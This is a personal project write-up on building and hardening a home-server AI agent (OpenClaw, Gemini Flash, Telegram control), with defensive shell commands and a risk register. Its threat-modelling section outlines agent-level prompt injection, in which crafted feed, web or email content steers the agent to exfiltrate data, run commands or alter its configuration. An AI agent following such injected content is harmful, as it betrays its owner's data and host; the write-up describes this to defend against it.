YOOLBOT — Building a 24/7 AI Companion on a Hardened Home Server

How I converted a wiped laptop into a hardened, always-on AI server — running OpenClaw on WSL2, a Gemini Flash backend, and a Telegram command interface — and why I treated every component as a potential attack surface from day one.

TL;DR

A wiped laptop runs Windows + WSL2, OpenClaw as the agent runtime, Gemini Flash as the model backend, and Telegram as the command interface, with a VPS relay for external connectivity. Every component was threat-modelled and locked down to least privilege from day one.

01 — Background

Why I Built This

The idea behind YOOLBOT came from a simple frustration: I wanted an AI assistant that was actually mine — not a SaaS endpoint I was renting access to, not something that reset its context every session, and not something living on hardware I shared with personal data. I wanted persistent, always-on compute under my control.

As someone building a career in security, I also wanted to understand what running an internet-connected AI agent actually looks like from a threat modelling perspective. It's easy to talk about attack surfaces in theory. Running your own is a different exercise entirely. So this project served two purposes: build something useful, and deliberately stress-test my own infrastructure decisions.

The name YOOLBOT comes from YOOL — Your Own Ongoing Legacy — the same philosophy behind the broader project of documenting what I build. The bot was meant to be an extension of that: a persistent digital companion that could work autonomously and be reached at any time.


02 — Architecture

How It's Built

The hardware is a dedicated laptop, fully wiped and rebuilt from scratch. The decision to wipe was deliberate — not just for cleanliness, but as a security posture decision. Any existing software, credentials, cached tokens, or residual data from a previous life as a personal machine becomes an attack surface. Starting from zero removes that entire class of risk.

Request flow
📱 Telegram (mobile)
→ Telegram API servers
→ VPS relay (static IP)
→ YOOLBOT host (WSL2)
→ OpenClaw runtime
→ Gemini Flash API

Cron scheduler
→ Autonomous background tasks

Windows + WSL2 as the base

The host OS is Windows, with WSL2 running the Linux environment where YOOLBOT actually lives. This isn't the most elegant setup from a purist perspective — a bare-metal Linux install would be simpler — but WSL2 provides a meaningful security boundary between the agent runtime and the host OS. If the WSL2 environment were compromised, the blast radius would be partially contained by the hypervisor separation. It also allowed for a familiar management layer on the Windows side while keeping the bot sandboxed in a clean Linux environment.

OpenClaw as the agent runtime

OpenClaw acts as the orchestration layer — managing the agent loop, tool dispatch, and context handling. It's what gives YOOLBOT the ability to do more than just respond to messages. With cron jobs wired in, YOOLBOT could execute scheduled tasks entirely independently: pulling data, running checks, logging outputs — all without me initiating a conversation.
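The shape of that orchestration layer can be sketched in a few lines. This is an illustrative toy, not OpenClaw's actual API: the point is that the agent can only dispatch tools that were explicitly registered, which is the hook where scoping decisions later in this write-up attach.

```python
from dataclasses import dataclass, field
from typing import Callable

@dataclass
class Agent:
    """Toy agent loop: receive a tool request, dispatch it if registered."""
    tools: dict[str, Callable[[str], str]] = field(default_factory=dict)

    def register(self, name: str, fn: Callable[[str], str]) -> None:
        self.tools[name] = fn

    def dispatch(self, tool: str, arg: str) -> str:
        # Only explicitly registered tools can run; anything else is refused.
        if tool not in self.tools:
            return f"unknown tool: {tool}"
        return self.tools[tool](arg)

agent = Agent()
agent.register("echo", lambda s: s.upper())
print(agent.dispatch("echo", "status ok"))   # STATUS OK
print(agent.dispatch("rm_rf", "/"))          # unknown tool: rm_rf
```

The registry doubles as an allow-list: the set of registered tools is the agent's entire capability surface.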

Gemini Flash as the LLM backend

The intelligence layer runs through Google's Gemini Flash API. The API key lives in a .env file, never hardcoded into the source. This is a basic but non-negotiable practice — API keys committed to source code are one of the most common and avoidable exposure vectors, and treating secrets as configuration rather than code is a discipline worth building from the start.
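The secrets-as-configuration pattern is worth pinning down in code. A minimal sketch, assuming the .env file has already been loaded into the process environment (e.g. with python-dotenv or by the shell); the variable name and the stand-in value are illustrative:

```python
import os

def load_secret(name: str) -> str:
    """Read a secret from the environment; fail fast if it's missing."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError(f"{name} is not set: check the .env file")
    return value

# Stand-in value for demonstration only; in production this comes from .env
os.environ["GEMINI_API_KEY"] = "dummy-value-for-demo"
api_key = load_secret("GEMINI_API_KEY")
```

Failing fast on a missing key is deliberate: a bot that silently starts without credentials fails later, in a harder-to-diagnose place.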

Telegram as the command interface

Telegram was the right choice here for several reasons. The bot API supports long polling — the bot reaches out to Telegram's servers to check for messages rather than exposing a port that Telegram pushes to. This means no inbound connection from the open internet to the host machine is needed. Telegram also handles its own authentication layer, so access to the bot is gated behind my Telegram account credentials, with an allow-list of authorised user IDs enforced in the bot itself. From my phone, I have a full terminal-like interface wherever I am.

VPS relay for external connectivity

Rather than port-forwarding directly from my home router — which would expose my home IP and require opening inbound ports — I routed traffic through a VPS with a static IP. The home machine connects outbound to the VPS; the VPS terminates external traffic. This keeps the home machine's IP undisclosed and means no inbound ports need to be opened at the router level. It's a meaningful reduction in exposure even though it adds a hop.


03 — Threat Modelling

OpenClaw: The Security Considerations

OpenClaw is the component that required the most careful thinking. As an agentic AI framework — one capable of executing tools, running shell commands, reading and writing files, and making outbound network requests — it is by design a powerful and permissive runtime. That power is also its attack surface. Before deploying it, I tried to reason through what could go wrong.

Critical Risk Class

Agentic AI runtimes like OpenClaw operate with elevated trust by design — they are built to take actions, not just produce text. Any vulnerability that allows an attacker to influence the agent's input or tool dispatch is potentially equivalent to arbitrary code execution on the host. This threat class deserves the same severity rating as an RCE vulnerability.
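One way to blunt that equivalence is to never hand model output to a shell unparsed. A minimal sketch of the idea (the function name and ALLOWED_BINARIES set are illustrative, not OpenClaw's API): split the proposed command with shell quoting rules and refuse anything whose binary isn't explicitly allow-listed.

```python
import shlex
import subprocess

ALLOWED_BINARIES = {"uptime", "df", "date"}  # illustrative allow-list

def run_agent_command(raw: str) -> str:
    """Execute a model-proposed command only if its binary is allow-listed."""
    parts = shlex.split(raw)
    if not parts or parts[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"refused: {raw!r}")
    # shell=False (the default with a list): no pipes, redirection, or
    # interpolation can be smuggled in through the model's output.
    return subprocess.run(parts, capture_output=True, text=True, check=False).stdout
```

Note that `shlex.split` turns `curl http://evil.example | sh` into plain arguments — the `|` never reaches a shell, and `curl` isn't on the list anyway.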

Prompt injection via external data

If YOOLBOT were configured to consume external data — RSS feeds, web pages, emails, API responses — a malicious actor could craft content designed to hijack the agent's behaviour. This is prompt injection at the agentic level: instead of just extracting information from the model, an attacker could potentially instruct it to exfiltrate data, execute commands, or modify its own configuration. The mitigation here is strict input scoping — YOOLBOT only processes inputs I send it directly through Telegram, from an authenticated account. No external data ingestion pipelines were wired in.
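That input scoping can be enforced in a few lines before an update ever reaches the agent. A hedged sketch — the user ID is a placeholder, and the dictionary shape follows Telegram's Bot API JSON for a message update:

```python
ALLOWED_USER_IDS = {123456789}  # placeholder for my own Telegram user ID

def is_authorised(update: dict) -> bool:
    """Accept a Telegram update only if the sender is on the allow-list."""
    sender = update.get("message", {}).get("from", {}).get("id")
    return sender in ALLOWED_USER_IDS
```

Anything failing this check is dropped silently; the model never sees it, so there is nothing for crafted content to inject into.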

Residual Risk

Even with Telegram as the sole input source, if my Telegram account were compromised, an attacker would inherit full control of YOOLBOT's command interface. This is why Telegram account security — strong password, 2FA enabled — is load-bearing for this entire architecture.

Tool and shell execution scope

OpenClaw's ability to run shell commands is its most powerful feature and its most dangerous one. I constrained this by running the bot as a dedicated non-root user inside the WSL2 environment. The user has no sudo access. This means that even if the agent were manipulated into attempting a destructive operation, it could not escalate to root — it cannot modify system files, install packages system-wide, or interact with the Windows host at the hypervisor level.

bash
# Create a dedicated low-privilege user for the bot
sudo adduser yoolbot --disabled-password
sudo usermod -s /bin/bash yoolbot

# Confirm no sudo access
sudo -l -U yoolbot
# Expected: User yoolbot is not allowed to run sudo on this host.

# Run the bot as the dedicated user
su -c "cd /home/yoolbot/yoolbot && python main.py" yoolbot

API key and secret exposure

Two secrets needed protecting: the Gemini Flash API key and the Telegram bot token. Both live in a .env file that is never committed to any repository and is readable only by the yoolbot user. The .gitignore is set to exclude .env files at the project root. The risk of key exposure is not just financial — a leaked Gemini API key means an attacker can run inference at your cost and, depending on API permissions, potentially access usage logs or quota information.

bash
# Lock .env to the bot user only
chmod 600 /home/yoolbot/yoolbot/.env
chown yoolbot:yoolbot /home/yoolbot/yoolbot/.env

# Verify
ls -la /home/yoolbot/yoolbot/.env
# -rw------- 1 yoolbot yoolbot ... .env

Network exposure and port discipline

One of the first things I did on the fresh install was audit what was listening on the network. Open ports are open doors. WSL2 by default may expose services on the host's network interface, and Windows itself runs several services that bind to ports. The principle here is simple: if a service isn't needed, it shouldn't be running, and if a port isn't needed, it shouldn't be open.

powershell — windows host
# Audit all listening ports on the Windows host
netstat -ano | findstr LISTENING

# Cross-reference with running processes
Get-NetTCPConnection -State Listen | Select-Object LocalPort, OwningProcess |
  ForEach-Object { $p = Get-Process -Id $_.OwningProcess -EA 0;
  [PSCustomObject]@{Port=$_.LocalPort; Process=$p.Name} } | Sort Port
bash — wsl2 environment
# Check what's listening inside WSL2
ss -tlnp

# Block everything incoming, allow established outbound
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw enable
sudo ufw status verbose

WSL2 Networking Note

WSL2 runs inside a Hyper-V VM with its own virtual network interface. UFW rules set inside WSL2 apply to that interface, but they don't control Windows Firewall on the host. Both layers need to be configured independently. I treated them as separate security boundaries and hardened each one.

Cron job attack surface

Cron jobs run on a schedule without user interaction, which means they need to be treated as an elevated-risk execution context. A misconfigured cron job running as root, or one that calls an external script that an attacker could modify, is a privilege escalation vector. My cron jobs run as the yoolbot user, call only scripts I control, and are scoped to read-only operations or write operations within a tightly bounded directory.

bash — crontab for yoolbot user
# Edit as the bot user, not root
crontab -u yoolbot -e

# Example: run a scheduled check every hour
0 * * * * /home/yoolbot/yoolbot/scripts/hourly_check.sh >> /home/yoolbot/logs/cron.log 2>&1

# Ensure scripts are not world-writable
chmod 750 /home/yoolbot/yoolbot/scripts/hourly_check.sh
chown yoolbot:yoolbot /home/yoolbot/yoolbot/scripts/hourly_check.sh

The "what if the laptop itself is compromised" question

This is the question that drove the decision to wipe the machine entirely before starting. A laptop with a history — personal browsing, saved credentials, old tokens in browser storage — is a risk even before you run anything new on it. Starting from a known-clean state means you can reason about what's on the machine because you built it from scratch. You know every piece of software that was installed. You know every service that was enabled. The threat model is tractable.

The absence of personal data on the machine is also load-bearing. If YOOLBOT were somehow exploited and the host compromised, there's nothing to exfiltrate beyond the bot's own operational data. No documents, no saved passwords, no browser history. The blast radius is bounded.


04 — Risk Register

Threat Summary

A structured breakdown of the threats I identified and the mitigations I put in place.

| Threat | Severity | Vector | Mitigation | Status |
| --- | --- | --- | --- | --- |
| Prompt injection via agent input | High | Malicious Telegram message / external data | Input source locked to authenticated Telegram account only. No external data ingestion. | Mitigated |
| Shell command escalation via OpenClaw | High | Agent tool misuse / manipulation | Bot runs as dedicated non-root yoolbot user with no sudo access. | Mitigated |
| API key / bot token exposure | High | Accidental repo commit, file permission misconfiguration | .env file chmod 600, excluded from version control via .gitignore. | Mitigated |
| Telegram account takeover | High | Phishing / SIM swap / credential theft | Strong password + 2FA on Telegram account. No recovery phone as sole factor. | Mitigated |
| Open port exploitation on host | Medium | Network scanning / service exploitation | UFW default-deny inbound on WSL2. Windows Firewall reviewed and hardened on host. VPS relay hides home IP. | Mitigated |
| Unnecessary services exposing attack surface | Medium | Default OS services running on unused ports | Services audited post-install. Non-essential Windows features disabled. WSL2 services reviewed. | Mitigated |
| Cron job privilege escalation | Medium | World-writable scripts, misconfigured crontab | Cron runs as yoolbot user. All scripts chmod 750, owned by yoolbot. | Mitigated |
| VPS relay compromise | Medium | Weak VPS credentials, unpatched software | SSH key auth only on VPS, password auth disabled. Regular patching cadence. | Ongoing |
| Gemini API abuse / quota hijacking | Low | Leaked API key used by third party | Key scoped to minimum required permissions. Usage monitoring via Google Cloud console. | Mitigated |
| WSL2 escape to Windows host | Low | WSL2 hypervisor vulnerability | WSL2 kept updated. Windows host patched. No sensitive data on host to exfiltrate regardless. | Monitored |
| Personal data residue on host | Low | Pre-existing data surviving wipe | Full drive wipe before installation. Machine has never held personal data in its current state. | Mitigated |

05 — Reflections

What I Learned

Agentic AI is a new attack surface class

Working with OpenClaw made it concrete in a way that reading about it doesn't: an AI agent that can execute tools is categorically different from a chatbot. The threat model for a chatbot is mostly about data leakage and model manipulation. The threat model for an agent is closer to that of a server process with elevated permissions. It needs to be treated accordingly — principle of least privilege, input validation, blast radius minimisation.

The wipe decision was the right one

Starting from a clean install might seem like overkill for a personal project, but it's actually one of the highest-leverage security decisions you can make. It eliminates an entire category of unknown unknowns. You can't enumerate what you don't know is there. A clean baseline means you can reason about what's running on your machine, and that tractability is valuable.

Infrastructure security is inseparable from application security

It would have been easy to focus only on the bot code and treat the host as someone else's problem. But the host is never someone else's problem when you're running it yourself. The firewall rules, the user permissions, the port audit — these aren't separate concerns from the bot's security. They're the same concern expressed at different layers. Defence in depth only works if you actually build the depth.

Key Takeaway

The most effective security decisions in this project weren't clever — they were disciplined. A dedicated non-root user. Secrets in .env. Default-deny firewall. A wiped host. These aren't advanced techniques. They're fundamentals applied consistently. Most real-world security failures aren't failures of sophistication — they're failures of consistency.

